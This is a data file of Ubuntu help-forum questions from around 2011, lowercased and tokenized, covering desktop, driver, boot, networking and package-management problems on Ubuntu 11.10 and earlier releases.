89658	did n't show application , places etc things in ubuntu 11.10 desktop	sir , am a new beginner in linux . i installed ubuntu 11.10 in my pc and in the desktop menu bar it did n't show application , places etc things.. how to get this ? pls help me to solve this ... .
89659	how do i monitor cpu core usage per thread ?	i need this information to optimize the number of worker threads my custom application is allocating . for example , if i just use top on a single-threaded application on a two-core machine , the 100 % cpu usage does not tell me if there is still unused capacity in the form of the other core ! what kind of monitoring tools can i use to detect the difference ?
89663	how do i install mcomix ?	since short i discovered comics in digital . it actually is fun reading comics on pc . anyway i 'm currently using comix for my comic files ( .cbr .cbz etc ) now i discovered that comix is discontinued en mcomix is taking it 's place . but i do n't know how to install it . when i start mcomix without installing it works perfectly but when i try to install it says something about dependencies or something . i do n't get it what am i supposed to do ?
89665	64 bits os on a 32 bits laptop computer	my computer has a 32 bits processor , when i install from a clean version ubuntu 11.10 , i download a 32 version , but wubi request me a 64 bit , i do n't know by a agree with this and now i have a 64 bits ubuntu on a 32 bits processor with a lot of errors how can i fix this since i try later to installed again and happened the same .
89666	how can i set up a keyboard shortcut to 'aero snap ' windows in gnome shell ?	i realize ubuntu uses unity as its shell but this question is specific to gnome shell running on top of ubuntu : is there any way to use the 'aero snap ' functionality in gnome shell to pin windows to the right or left side of the screen using only keyboard shortcuts ? i 've searched everywhere for this but there does n't seem to big a single application providing this somewhat basic functionality .
89667	is it possible to remove windows from hostmachine after installing ubuntu 11.10 inside it ?	i have two questions i installed ubuntu 11.10 inside of windows 7 on dual-boot using the wubi installer . i believe i used the 2nd option of 'installing inside windows ' with 'reduced disk performance ' . just wondering what the best way is to remove windows and have those partitions available for use by oneiric ocelot . is it possible to change the boot menu options to have ubuntu first . if so , how do i do this . i 'm open to good ideas .
89671	how paranoid should i be that the automatic package manager mechanism is going to remove packages that i use ?	when i use the packaging tool , it `` reminds '' me to use autoremove to remove packages which are no longer needed . but when i review the list , i see packages which i wish to keep . $ sudo apt-get install gnome-tweak-tool reading package lists ... done building dependency tree reading state information ... done gnome-tweak-tool is already the newest version . the following packages were automatically installed and are no longer required : ekiga libopal3.10.2 gnome-backgrounds gtali glchess gnome-games cheese gdebi gnobots2 gnome-icon-theme-extras libcheese-gtk20 libcheese1 gdebi-core libcapi20-3 gnibbles gnuchess-book libpt2.10.2 libcluttergesture-0.0.2-0 gnotski gir1.2-gucharmap-2.90 libclutter-imcontext-0.1-0 libspandsp2 cheese-common sound-juicer iagno glines libmx-1.0-2 libfolks-eds25 gnome-contacts gedit-plugins liferea gnotravex gnect quadrapassel liferea-data gnuchess gnome-video-effects use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . for example , in the above list , gnuchess and gnuchess-book are identified . i do n't wish for them to be removed . question : are these metapackages that i need not fight ( with apt ) to defend from removal ? will i lose the ability to play glchess ? nb . i used gnome-tweak-tool as an example in the commandline , knowing that it was already installed . this is irrelevant to my question .
89674	how to 'unplumb ' a network interface	i want to remove a un-use network interface on ubuntu 11.10 desktop but failed . virbr0 link encap : ethernet hwaddr 16:13:97:0c:0f:4f up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:19 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:4800 ( 4.8 kb ) me @ linux : ~ $ sudo ifconfig virbr0 down me @ linux : ~ $ sudo ifconfig virbr0 unplumb unplumb : unknown host ifconfig : ` -- help ' gives usage information . unplumb seem usable in solaris but not in ubuntu . any idea ?
89681	make a bootable internal drive to install ubuntu on current drive ?	is it possible to mount/burn ubuntu 10.10 on a clean drive , so that i can boot using that drive with the iso image and install the os on my other internal drive , while currently being in try ubuntu state ? my problems is that the dvd drive is corrupted and does not burn iso properly ; after install the hard drive wont boot . the only way is to use that cd to get my computer running in try ubuntu state . downloaded the new ubuntu 10.10 iso and trying to figure out how to make my 2nd internal hard drive become a bootable device so i can choose from to boot in bios .
89696	daemon wakeup via clock	i am writing a daemon ( my first ) and it needs to wake up every second and check a special piece of hardware . i have it checking the hardware , but how do i make it sleep , then wake on a specific second ? i 'd like to attach to the clock somehow and wake up using some kind of interrupt . polling is out of the question as i do n't want to spend the computer resources when idle . pascal ubuntu server 10.10 no oop
89699	change gnome terminal ( bash ) profile when changing to different user in the same terminal ( e.g . root )	is it possible to change the profile of a terminal upon switching user in the same terminal ? actually my goal is to change the terminal to a profile which indicates to me that it is a terminal as 'root ' and that i better be very careful . of course i am always very careful with root , and to improve that even more , i want to change the profile of the terminal so that it clearly shows to me that i 'm currently using a terminal that has root-priviliges . so for clarity : i do n't want to make a shortcut to open a bash terminal with a certain profile , i am thinking of some edits to .bashrc which detects a user change and can switch to a profile . is this possible , and if yes , how ? ; )
89701	installation of driver under root	i am trying to install a graphics driver as ubuntu wont boot on my new laptop due to graphics card problem i have downloaded laterst driver and put it on a pendrive can someone give me the commands from root to mount a pendrive and run the driver in it the file is ati-driver-installer-11-12-x86.x86_64.run its a driver on a pendrive for my ati radeon hd6470m that wont let me boot installation of 11.10 . i wanted to install it to see if ubuntu would then boot . probably best if you give me full instructions do i do it as antony @ antony or with a sudo comand etc ? thanks at command sudo mount /dev/sdb /mnt and after password request i get a series of numbers and ext2-fs ( sdb ) : error cant find an ext2 filesystem on dev sdb second line says simular only its says cant find ext4 filesystem . ati driver ... comand not found ... now i have mnt $ .thanks tried sudo mount -t vfat /dev/sdb /mnt ... . doesnt work ... i get fat-fs ( sdb ) : bogus number of reserved sectors mount : wrong fs type . the file was downloaded from ati onto pen using ubuntu 10.04 on another machine . should i format the pen and start again ? still get : /mnt $ update have formatted in fat but message almost same .
89710	how do i free up more space in /boot ?	my /boot partition is nearly full and i get a warning every time i reboot my system . i already deleted old kernel packages ( linux-headers ... ) , actually i did that to install a newer kernel version that came with the automatic updates . after installing that new version , the partition is nearly full again . so what else can i delete ? are there some other files associated to the old kernel images ? here is a list of files that are on my /boot partition : : ~ $ ls /boot/ abi-2.6.31-21-generic lost+found abi-2.6.32-25-generic memtest86+.bin abi-2.6.38-10-generic memtest86+_multiboot.bin abi-2.6.38-11-generic system.map-2.6.31-21-generic abi-2.6.38-12-generic system.map-2.6.32-25-generic abi-2.6.38-8-generic system.map-2.6.38-10-generic abi-3.0.0-12-generic system.map-2.6.38-11-generic abi-3.0.0-13-generic system.map-2.6.38-12-generic abi-3.0.0-14-generic system.map-2.6.38-8-generic boot system.map-3.0.0-12-generic config-2.6.31-21-generic system.map-3.0.0-13-generic config-2.6.32-25-generic system.map-3.0.0-14-generic config-2.6.38-10-generic vmcoreinfo-2.6.31-21-generic config-2.6.38-11-generic vmcoreinfo-2.6.32-25-generic config-2.6.38-12-generic vmcoreinfo-2.6.38-10-generic config-2.6.38-8-generic vmcoreinfo-2.6.38-11-generic config-3.0.0-12-generic vmcoreinfo-2.6.38-12-generic config-3.0.0-13-generic vmcoreinfo-2.6.38-8-generic config-3.0.0-14-generic vmcoreinfo-3.0.0-12-generic extlinux vmcoreinfo-3.0.0-13-generic grub vmcoreinfo-3.0.0-14-generic initrd.img-2.6.31-21-generic vmlinuz-2.6.31-21-generic initrd.img-2.6.32-25-generic vmlinuz-2.6.32-25-generic initrd.img-2.6.38-10-generic vmlinuz-2.6.38-10-generic initrd.img-2.6.38-11-generic vmlinuz-2.6.38-11-generic initrd.img-2.6.38-12-generic vmlinuz-2.6.38-12-generic initrd.img-2.6.38-8-generic vmlinuz-2.6.38-8-generic initrd.img-3.0.0-12-generic vmlinuz-3.0.0-12-generic initrd.img-3.0.0-13-generic vmlinuz-3.0.0-13-generic initrd.img-3.0.0-14-generic vmlinuz-3.0.0-14-generic currently , i 'm using the 3.0.0-14-generic kernel .
89715	software is not installing	i am trying to install a software ( texmaker ) . i am getting the error `` failed to download package files check your internet connection . '' my internet connection is working
89717	how can i move the system menu on the top bar to the left side ?	i am left-handed . on the top bar , i need the system menu ( and logout , user switch , clock , battery status , etc ) on the left side . and i need the global menu items as well as the window buttons ( close , minmize , maximize ) on the right side . how can i do this ?
89719	touchpad wo n't drag anything on a pavilion dv7t-5000	okay so i have a pavilion dv7t-5000 cto . first question is how do i get the correct drivers for my touch pad . i cant click with the touch pad button and drag the box . i have to use a mouse or click the top of the box and hit the move command and drag it ( pain in the butt ! ) i have the synaptics drivers installed but no resolution
89720	mobile broadband : tries to connect , disconnects before being done	i added this connection via the wizard : connection name : movistar ( i am in spain ) connect automatically : unchecked ipv4 settings tab : method : automatic ( ppp ) addresses , dns servers , search domains : empty/grayed/disabled fields routes ... : all empty mobile broadband tab : number : *99 # username : movistar password : movistar apn : movistar.es network id : empty type : any allow roaming if home network is not available : checked pin : 4 digits ( triple checked ) ppp settings : authentication : eap , pap , chap , mschapv2 , mschap configure methods : all checked use point-to-point encryption ( mppe ) : unchecked allow bsd data compression : checked allow deflate data compression : checked use tcp header compression : checked send ppp echo packets : unchecked in the connections systray widget , `` enable mobile broadband '' is checked , when i click on `` movistar '' in a couple of seconds a popup says : `` modem network : disconnected '' . it 's my first time and the documentation is helpless . any idea is welcome ! ubuntu 11.10 oneiric . device is an ubuntu-certified vostro v131 laptop sim card slot behind the battery : bus 002 device 007 : id 413c:818d dell computer corp . provider is movistar .
89722	ca n't boot ubuntu , because of dpkg	i cancelled removing the package `` gnome-desktop3-data '' this morning , and now i ca n't turn on my computer , i think i removed some crutial packages such as the lightdm greeter . so , i turned on the recovery console , and tried to re-install it . it told me i need to run `` sudo dpkg -- configure -a '' , but i ca n't run that either , i get an error ( will add here later ) , do i need internet for this command , because i ca n't access internet from recovery console . thanks in advance . the error i get is : '' dpkg : error : unable to access dpkg status are : read only file system '' i think it 's because the recovery console only has read-only access , but via normal boot i ca n't open a shell , not even tty1 . what should i do ?
89729	`` a problem occurred when checking for updates '' error	i 've already tried doing what was listed here : update manager : `` a problem occurred when checking for the updates '' but it didnt work . every time i click on the red circle with the line through it the update manager pops up and then goes away . when i try to do sudo apt-get update & & sudo apt-get upgrade here 's the output : ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease get:1 http : //dl.google.com stable release.gpg [ 198 b ] ign http : //archive.getdeb.net natty-getdeb inrelease get:2 http : //dl.google.com stable release.gpg [ 198 b ] get:3 http : //dl.google.com stable release [ 1,347 b ] ign http : //archive.canonical.com natty inrelease ign http : //us.archive.ubuntu.com natty inrelease ign http : //us.archive.ubuntu.com natty-updates inrelease ign http : //extras.ubuntu.com natty inrelease ign http : //archive.ubuntu.com natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //security.ubuntu.com natty-security inrelease ign http : //ppa.launchpad.net natty inrelease hit http : //packages.medibuntu.org natty inrelease hit http : //deb.torproject.org natty inrelease get:4 http : //dl.google.com stable release [ 1,347 b ] get:5 http : //dl.google.com stable/main i386 packages [ 1,214 b ] hit http : //archive.canonical.com natty release.gpg hit http : //us.archive.ubuntu.com natty release.gpg hit http : //extras.ubuntu.com natty release.gpg hit http : //archive.ubuntu.com natty release.gpg ign http : //dl.google.com stable/main translationindex ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease ign http : //ppa.launchpad.net natty inrelease hit http : //security.ubuntu.com natty-security release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //archive.getdeb.net natty-getdeb release.gpg ign http : //deb.paissad.net unstable inrelease get:6 http : //dl.google.com stable/main i386 packages [ 765 b ] ign http : //dl.google.com stable/main translationindex hit http : //archive.canonical.com natty release hit http : //us.archive.ubuntu.com natty-updates release.gpg hit http : //extras.ubuntu.com natty release hit http : //security.ubuntu.com natty-security release hit http : //archive.ubuntu.com natty release hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release.gpg hit http : //deb.paissad.net unstable release.gpg hit http : //packages.medibuntu.org natty/free i386 packages hit http : //deb.torproject.org natty/main sources hit http : //archive.getdeb.net natty-getdeb release hit http : //us.archive.ubuntu.com natty release hit http : //archive.canonical.com natty/partner i386 packages hit http : //extras.ubuntu.com natty/main sources hit http : //ppa.launchpad.net natty release.gpg hit http : //ppa.launchpad.net natty release hit http : //security.ubuntu.com natty-security/restricted sources hit http : //archive.ubuntu.com natty/main sources hit http : //deb.paissad.net unstable release ign http : //archive.canonical.com natty/partner translationindex hit http : //us.archive.ubuntu.com natty-updates release hit http : //extras.ubuntu.com natty/main i386 packages ign http : //extras.ubuntu.com natty/main translationindex hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //security.ubuntu.com natty-security/main sources hit http : //security.ubuntu.com natty-security/multiverse sources hit http : //security.ubuntu.com natty-security/universe sources hit http : //security.ubuntu.com natty-security/main i386 packages hit http : //security.ubuntu.com natty-security/restricted i386 packages hit http : //archive.ubuntu.com natty/restricted sources hit http : //archive.getdeb.net natty-getdeb/games i386 packages hit http : //deb.paissad.net unstable/main sources hit http : //packages.medibuntu.org natty/non-free i386 packages hit http : //us.archive.ubuntu.com natty/restricted sources hit http : //us.archive.ubuntu.com natty/main sources hit http : //us.archive.ubuntu.com natty/multiverse sources hit http : //us.archive.ubuntu.com natty/universe sources hit http : //us.archive.ubuntu.com natty/main i386 packages hit http : //deb.torproject.org natty/main i386 packages hit http : //ppa.launchpad.net natty release hit http : //ppa.launchpad.net natty release hit http : //security.ubuntu.com natty-security/multiverse i386 packages hit http : //security.ubuntu.com natty-security/universe i386 packages ign http : //security.ubuntu.com natty-security/main translationindex ign http : //security.ubuntu.com natty-security/multiverse translationindex ign http : //security.ubuntu.com natty-security/restricted translationindex ign http : //security.ubuntu.com natty-security/universe translationindex hit http : //deb.paissad.net unstable/contrib sources hit http : //deb.paissad.net unstable/non-free sources hit http : //deb.paissad.net unstable/main i386 packages hit http : //deb.paissad.net unstable/contrib i386 packages hit http : //deb.paissad.net unstable/non-free i386 packages hit http : //us.archive.ubuntu.com natty/restricted i386 packages hit http : //us.archive.ubuntu.com natty/multiverse i386 packages hit http : //us.archive.ubuntu.com natty/universe i386 packages ign http : //us.archive.ubuntu.com natty/main translationindex ign http : //us.archive.ubuntu.com natty/multiverse translationindex ign http : //us.archive.ubuntu.com natty/restricted translationindex ign http : //us.archive.ubuntu.com natty/universe translationindex ign http : //archive.getdeb.net natty-getdeb/games translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //deb.paissad.net unstable/contrib translationindex ign http : //deb.paissad.net unstable/main translationindex ign http : //deb.paissad.net unstable/non-free translationindex ign http : //packages.medibuntu.org natty/free translationindex ign http : //dl.google.com stable/main translation-en hit http : //us.archive.ubuntu.com natty-updates/restricted sources hit http : //us.archive.ubuntu.com natty-updates/main sources hit http : //us.archive.ubuntu.com natty-updates/multiverse sources hit http : //us.archive.ubuntu.com natty-updates/universe sources hit http : //us.archive.ubuntu.com natty-updates/main i386 packages hit http : //us.archive.ubuntu.com natty-updates/restricted i386 packages hit http : //us.archive.ubuntu.com natty-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com natty-updates/universe i386 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex ign http : //deb.torproject.org natty/main translationindex ign http : //us.archive.ubuntu.com natty-updates/main translationindex ign http : //us.archive.ubuntu.com natty-updates/multiverse translationindex ign http : //us.archive.ubuntu.com natty-updates/restricted translationindex ign http : //us.archive.ubuntu.com natty-updates/universe translationindex hit http : //ppa.launchpad.net natty/main sources hit http : //ppa.launchpad.net natty/main i386 packages ign http : //ppa.launchpad.net natty/main translationindex ign http : //packages.medibuntu.org natty/non-free translationindex ign http : //archive.canonical.com natty/partner translation-en_us ign http : //extras.ubuntu.com natty/main translation-en_us ign http : //archive.canonical.com natty/partner translation-en ign http : //extras.ubuntu.com natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //security.ubuntu.com natty-security/main translation-en_us ign http : //security.ubuntu.com natty-security/main translation-en ign http : //ppa.launchpad.net natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //security.ubuntu.com natty-security/multiverse translation-en_us ign http : //security.ubuntu.com natty-security/multiverse translation-en ign http : //security.ubuntu.com natty-security/restricted translation-en_us ign http : //us.archive.ubuntu.com natty/main translation-en_us ign http : //us.archive.ubuntu.com natty/main translation-en ign http : //ppa.launchpad.net natty/main translation-en_us ign http : //ppa.launchpad.net natty/main translation-en ign http : //security.ubuntu.com natty-security/restricted translation-en ign http : //security.ubuntu.com natty-security/universe translation-en_us ign http : //security.ubuntu.com natty-security/universe translation-en ign http : //us.archive.ubuntu.com natty/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty/multiverse translation-en ign http : //us.archive.ubuntu.com natty/restricted translation-en_us ign http : //us.archive.ubuntu.com natty/restricted translation-en ign http : //us.archive.ubuntu.com natty/universe translation-en_us ign http : //deb.paissad.net unstable/contrib translation-en_us ign http : //deb.paissad.net unstable/contrib translation-en ign http : //deb.paissad.net unstable/main translation-en_us ign http : //deb.paissad.net unstable/main translation-en ign http : //deb.paissad.net unstable/non-free translation-en_us ign http : //us.archive.ubuntu.com natty/universe translation-en ign http : //us.archive.ubuntu.com natty-updates/main translation-en_us ign http : //us.archive.ubuntu.com natty-updates/main translation-en ign http : //deb.paissad.net unstable/non-free translation-en ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com natty-updates/multiverse translation-en ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com natty-updates/restricted translation-en ign http : //us.archive.ubuntu.com natty-updates/universe translation-en_us ign http : //us.archive.ubuntu.com natty-updates/universe translation-en ign http : //archive.getdeb.net natty-getdeb/games translation-en_us ign http : //archive.getdeb.net natty-getdeb/games translation-en ign http : //deb.torproject.org natty/main translation-en_us ign http : //deb.torproject.org natty/main translation-en ign http : //packages.medibuntu.org natty/free translation-en_us ign http : //packages.medibuntu.org natty/free translation-en ign http : //packages.medibuntu.org natty/non-free translation-en_us ign http : //packages.medibuntu.org natty/non-free translation-en fetched 5,069 b in 9s ( 544 b/s ) reading package lists ... done reading package lists ... done alex @ griever : ~ $ ncy tree ... 50 % and stops there ... . doesnt move past that.. anyone have any advice ?
89731	ubuntu 11.10 disconnects me from internet ( cable )	i 'm connected to the internet via router ( wired ) and ubuntu disconnects me from it . i have to manually disconnect from my network ( via panel in top-right corner ) and connect again . i do n't know why . can someone help me ? i will give any information that will be needed . p.s . on windows 7 everything is ok , so it is n't the fault of the network card .
89732	ca n't install on an asus f5gl laptop	i downloaded ubuntu 11.10 and wanted to install it on my asus f5gl series laptop . ( it is around four years old by now ) . i created a bootable usb stick installer following the instructions on the ubuntu page . i can get my laptop to recognize the usb stick , but i can neither boot it nor use it to install . if i boot the ubuntu install usb stick , it starts , plays the intro sound and shows the wallpaper and the mouse pointer . but then nothing else happens . if i try to install then sort of the same thing happens . it starts , does the same thing as before and the install window pops up . but there is no text in the window . i can move the mouse pointer but i can not click on anything . does anyone know what might be wrong ? i have searched the web for people with similar problems but so far no luck . can it be related , somehow , to my laptop specs ? should i install an older version ? updated copied from comment : i have already tried to install ubuntu on windows ( with wubi ) . the same thing happened . i could only see the wallpaper and the mouse pointer but nothing else . my disk is a hitachi hts542525k9a00 . if i go into the bios , i only get an option related to sata to toggle between enhanced and compatible . ( i do n't recall the name of the option . )
89734	how can i change the text colour on my desktop icons ?	how can i change the text font colour of my icons on my desktop . i have used gnome-color-chooser by choosing `` desktop '' panel and changing to white colour on colorize with but unfortunately , nothing was changed . please what can i do ?
89740	setting up a dual-boot system from usb ? ( 10.04.3 lts )	i 'm trying to setup a dual-boot configuration on my computer , and from what i understand the ubuntu installer has the capacity to downsize windows ' partitions to make way for it 's own using an option called `` install side-by-side . '' i 'd intended to use this option , but found in conspicuously absent from the installer from the live os . i 'm booting ubuntu off of a usb stick , by the way . any suggestions as to what 's wrong ? also , should i maybe just research how to properly specify the partitions manually and do it that way ? thanks for reading ! -redd
89744	suspending computer and maintaining internet connection	some computers in this network have allocated lan ip addresses , although other computers ( the visitors ) can sometimes steal the allocated ip addresses . recently , suspended computers are losing their ability to connect . when i suspend my computer , are all internet connections disconnected ?
89747	is swap used when suspending a computer	i know that swap is used when putting a computer into hibernation . but is swap used when the computer is suspended ?
89748	is there any easy way to trace a route in ubuntu ?	is there any easy way to track the route that an request takes in ubuntu ? for example , tell me what the dns servers are , which servers it redirects through before reaching the final page , etc . is there any program or command that i could do this with ?
89749	netbook ubuntu can i install something better now	running ubuntu on a netbook but lets face it its not very exciting . can i run 11.10 on a netbook n455 its a 1.6hz 1mb . can i install 11.10 or something better ( at least a 10.xx vesrion ) rather than using the netbook version which is a bit basic . i see that netbook version is now discontinued.. w7 got corrupted when i installed so i want to be sure that new ubuntu wont make things worse .
89751	hp-laserjet-100-colormfp-m175a ppd file	i am trying to install hp printer hp-laserjet-100-colormfp-m175a model and i ca n't seem to get it right.where can i find the ppd file for this model ? .
89753	how do i move panel ( not launcher ) icons in ubuntu unity ?	i 've added a couple of applets to the ubuntu unity top panel . how can i move them from the right side to the left side ? for example , in this video , the person seems to have moved the unity panel applet `` classic-menu-indicator '' to the left side of the screen . i assume dconf-editor will be involved . how can this be done for any added panel applet ?
89755	setup samba share on 10.10 and access via windows	i have the following /etc/samba/smb.conf config setup to share my homes and a custom folder named /var/itc_data_feed : [ homes ] comment = home directories browseable = yes read only = no [ itc_data_feed ] comment = itc_data_feed path = /var/itc_data_feed read only = no after editing this file i restarted smbd with the following command : sudo smbd reload i would expect to be able to access these on windows oss through start- > run : \\myservername\someuser or \\myservername\itc_data_feed but neither are working . what am i missing or doing wrong ? update it seems that i can not connect using the servername but rather i must use ip address . once i use ip address i am asked to authenticate with my linux credentials ; however , i am wanting an open share that does not require authentication . to achieve this i intentionally omitted the valid users line but i am still being asked to authenticate , why is this happening ?
89759	what should i do before changing graphics card ?	i 'm thinking about buying a new graphic card . what should i do before removing the old one , other than removing proprietary drivers ?
89760	acpi startup error on ubuntu 11.10 but worked on 11.04	i have looked around quite a bit for an issue like this , but cant find anything . i had ubuntu 11.04 running on my desktop with no issues . i then formated the drive to install 11.10 . i managed to get 11.10 installed using acpi=off command on the install menu . i now need to add the same command on each stat up ( using 'e ' on the boot menu ) and the system wont shut down without me pushing the power button . is there no way i can use acpi config of ubuntu 11.04 ? i 'm running an intel motherboard pendium 4 . thanks in advance . tristan .
89769	change keyboard value	my nephew played with my keyboard and now my s key is out . is there a way i can change the keyboard layout to attribute the s value to a key i do n't use ( ie , right alt ) ? to make myself crystal clear , is there a way that i can tell ubuntu that when i press the right alt , it prints s ?
89770	upnp with ushare to an xbox 360 arcade	i am looking for sharing things like a folder with ushare . i got the program running with xbox to play the music but it crashes through a song . does anyone know how to fix it ? my router is echolife ( it came with the talktalk broadband ) . it looks like a picture frame you find it if you live in the uk . just want to ask if it can be fixed or if it is a router problem . do i need to configure anything in ushare ?
89774	gnome panel alt-right click does not work	the alt-right click does not work for editing the gnome-panel in the unity interface , but i eventually found that holding alt and clicking both mouse buttons at the same time worked to bring up the panel 's properties menu . it 'occasionally ' works when i hold alt and press both mouse buttons on any panel applets . most of the time i am stuck with the added applets . i was able to delete the top gnome-panel . but when i changed the bottom panel 's properties to be on the right side of the screen , it completely disappeared , and there was no way to get it back , even when i logged in with gnome-classic . ( so far , i have had to dump gnome-panel as an option for an extra ubuntu 11.10 panel , there appears to be too many conflicts between the gnome panel and the new unity interface . ) are there any configurations that be altered to make the editing of the gnome-panel more easier ? such as in gconf-editor or dconf-editor ?
89775	netbook ubuntu installation broke windows 7	when i installed ubuntu for netbook about a year ago it broke something in windows 7 and now windows 7 goes to blue screen all the time . i do n't use windows anymore but it might be nice to fix . any suggestions on what has happened and a fix as i do n't have the windows installation cd . is there a simple fix ? so just trying to boot windows ( its been a long time ) its runs the loading bar for about 3 minutes then flashes to blue screen for about 1 second then reboots by itself . ubuntu is 2.6.32-37 netbook version . hope this helps if not ask and i will try to see more .
89778	there is no keynavrc file for keynav in the home folder	i recently installed keynav from the software center . as per this question , i wanted to change the configuration of keynav so that i could use the arrow keys instead of using a mouse to navigate the mouse cursor . however , keynav did not place the ~/.keynavrc file into my home directory ( i have hidden files shown ) . is anyone here familiar with this program , and how can i reconfigure the keynav keys ?
89791	customize gnome 3 classic	well , i was wondering if there is anyway to customize gnome 3 classic.i have seen some very sick ubuntu desktops while i was watching youtube videos.to give you an example of what i mean think ( if you do not have something like this : - ) ) nice meters for cpu , ram , network traffic , temperature , etc trasnparent windows cool toolbars ( with media players on them , shortcuts ) , cool graphical-transparent banners which show ip address and other info and a nice background image ( like something black-ish or not it does n't really matter ) .you know something that make your feel that your computrer has come from the distant future : -= ) . τhanks for your attention !
89803	what does the installation of linux- { image , headers } -generic-lts-backport-natty do ?	what do these command do ? sudo apt-get install linux-image-generic-lts-backport-natty \ linux-headers-generic-lts-backport-natty does it install just a new linux version or something more ? and what about : sudo apt-get purge linux-image-generic-lts-backport-natty \ linux-headers-generic-lts-backport-natty does it just remove the packages installed by the previous command ? ( or does it more ? ) if i am correct in all cases why it does n't work ? i get an error , so it means it 's not true and something else had happened ? edit : as it was said that second command does n't remove it , then would this command remove it ? aptitude autoremove
89804	ca n't set transparent terminal background in xubuntu 11.10	i feel sorry for upgrading to that buggy version . one of the issues is that terminal background , which i configured to be transparent , became solid color , even though it is set to transparent in preferences . how can i get back my transparency ? is it due to any libraries missing ?
89806	unity on 2 screens without main application menus	i 'm used to work with 2 monitors , but after switching to unity i can not access the main menus of applications . the main menu panel is only displayed on one of the screens is there a way of dealing with this ? ! ( see the screenshot ) . no main menu on unity with 2 screens
89814	screen text is blurry / fuzzy	coming from win xp . trying ubuntu 11.04 / gnome classic ui , and love it ! only real problem i have : under win xp , the text on the screen and inside any prog. , is always crisp and easy to read . but in ubuntu , the screen text looks slightly blurred ( fuzzy ) , hard to read - not crisp & clear , as in xp ... for any prog . ( firefox , gedit , you name it ) . tried : system > preferences > appearance > fonts > details and played with smoothing & hinting options , and also tried different fonts listed there . result : only marginally better , but still fuzzy text . ( btw : same blurry text when i tried linux mint 11 and linux mint 11 lxde distros ) . my assumption : i 'm not a hardware nor systems guy , but i suspect that ubuntu 11.04 and my graphics card ( ati radeon x1300pro 256mb ram ) , do n't play nice together . anyone out there has experience with any incompatibility of ati radeon x1300pro graphic cards with ubuntu ? ( and what to do about it ... ) . an ati driver issue , or maybe another issue / solution ? thanks for any pointers / fixes ! . dell optiplex 745 desktop w/ 2gb ram ati radeon x1300pro 256mb ram lg 1953h lcd - 19 inch monitor
89817	how to setup dual monitors on 11.10 with 3d acceleration on ati card ?	this question has been mentioned indirectly alot on the website , but there has always lacked : a complete solution an up-to-date approach a solution matching my situation ( which might be common ) so the problem is that after installing the latest ati proprietary drivers following the steps given here and then opening up the catalyst center to setup the second monitor and rebooting , the second monitor appears blank with a x ( or cross ) instead of the mouse pointer . if i enable xinerama in the catalyst center i get a dual desktop but i lose all 3d acceleration effects and there other weird effects that bother me . running fglrxinfo in the terminal gives me this : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5700 series opengl version string : 4.2.11318 compatibility profile context display : :0 screen : 1 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati radeon hd 5700 series opengl version string : 4.2.11318 compatibility profile context how do i get both the dual monitor setup and the 3d acceleration ?
89819	unable to boot 11.10 due to graphic driver problem with ati radeon hd6470m o amd a8 quad core	i have been trying to find a solution for a graphics bug with little luck so far . has anybody found the solution to the ati radeon graphics problem ? i have a laptop with amd a8 with ati amd radeon hd 6470m and h6620g i cant boot ubuntu . i have the latest driver downloaded on flash drive but cant figure out how to get it into the ubuntu programe . i ca n't do wget downloaded into root . can someone tell me if they have resolved and if so how as there is little point now asking for solutions for part of the problem is someone already resolved the main issue . i feel really stupid i have a whole bunch of laptops running 11.10 even a netbook . the quadcore i just bought is sitting gathering dust .
89824	broken appearance in gnome-shell	yesterday i formatted my computer and reinstall ubuntu 11.10 , then i installed gnome-shell . but now i have a problem with the applications overview in gnome-shell . when i press the button `` applications '' i see strange lines over the icons . i get this with the default theme too ( default icons and gnome-shell theme ) . i did a new installation for ubuntu but the problem remains :
89826	what is tumblerd ?	i 've recently switched to xubuntu and just noticed a process i 've not come across before -- -tumblerd that was eating about 100mb . i ca n't find much information about this , except for this on sourceforge . should i be concerned ?
